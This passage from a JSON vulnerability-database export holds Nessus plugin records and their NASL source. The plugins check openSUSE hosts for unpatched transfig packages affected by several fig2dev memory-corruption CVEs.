3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LKD7IBCZKGMDHLZ7H4T5P7WTXHNFSOB6/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ffff1ea\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'transfig-3.2.8a-lp152.6.6.2', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:transfig", "cpe:/o:novell:opensuse:15.2"], "solution": "Update the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-08-10T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-12T11:33:48", "differentElements": ["nessusSeverity"], "edition": 1}], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2778.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-14823-1.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2020-1398.NASL", "AL2_ALAS-2021-1682.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1702.NASL", "SUSE_SU-2020-1806-1.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2021-3124-1.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-19746", "CVE-2019-14275", "CVE-2019-19555", "CVE-2021-3561"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-14275", "RH:CVE-2019-19555", "RH:CVE-2019-19797"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2019-19746"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:B794B627F4F0", "FEDORA:E540F6253477", "FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18"]}, {"type": "amazon", "idList": ["ALAS2-2021-1682", "ALAS2-2020-1398"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877387", "OPENVAS:1361412562310877368"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-08-19T11:58:33", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-08-19T11:58:33", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152472", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1143-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152472);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/11\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:1143-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:1143-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LKD7IBCZKGMDHLZ7H4T5P7WTXHNFSOB6/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ffff1ea\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'transfig-3.2.8a-lp152.6.6.2', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:transfig", "cpe:/o:novell:opensuse:15.2"], "solution": "Update the affected transfig package.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-08-10T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "OPENSUSE-2021-2454.NASL", "hash": "d70e6f283e0af1fa4a40977da57f9dfc", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152011", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "http://www.nessus.org/u?30d9d3a0", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "https://www.suse.com/security/cve/CVE-2019-19797", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1159293", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2021-3561", "https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1143650", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-19T11:59:09", "history": [{"bulletin": {"id": "OPENSUSE-2021-2454.NASL", "hash": "8e59a2da217029bae4722f993cb0b5300acca4ef9de73b47d446929ae6e8a0f6", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152011", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1186329", "http://www.nessus.org/u?30d9d3a0", "https://www.suse.com/security/cve/CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1143650"], "cvelist": ["CVE-2019-19746", "CVE-2019-19555", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19797"], "immutableFields": [], "lastseen": "2021-07-23T18:36:35", "history": [], "viewCount": 170, "enchantments": {"dependencies": {"modified": "2021-07-23T18:36:35", "references": [{"idList": ["UB:CVE-2019-19746", "UB:CVE-2019-19555", "UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2021-3561"], "type": "ubuntucve"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19555", "RH:CVE-2019-19797", "RH:CVE-2019-14275", "RH:CVE-2019-19746"], "type": "redhatcve"}, {"idList": ["CVE-2019-19746", "CVE-2019-19555", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19797"], "type": "cve"}, {"idList": ["SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2020-1843.NASL", "FEDORA_2020-6A2824178E.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1702.NASL", "DEBIAN_DLA-2073.NASL", "AL2_ALAS-2021-1682.NASL", "SUSE_SU-2020-1806-1.NASL", "AL2_ALAS-2020-1398.NASL"], "type": "nessus"}, {"idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"], "type": "amazon"}, {"idList": ["FEDORA:983DF624CFF6", "FEDORA:73FB862622DB", "FEDORA:9C4BF3072F18", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:E540F6253477"], "type": "fedora"}, {"idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310877387", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877359"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2021-07-23T18:36:35", "rev": 2, "value": 6.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "152011", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152011);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RK4BRVCUPZKN5VS2JGWBPYITONWJCIZJ/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?30d9d3a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:opensuse:15.3", 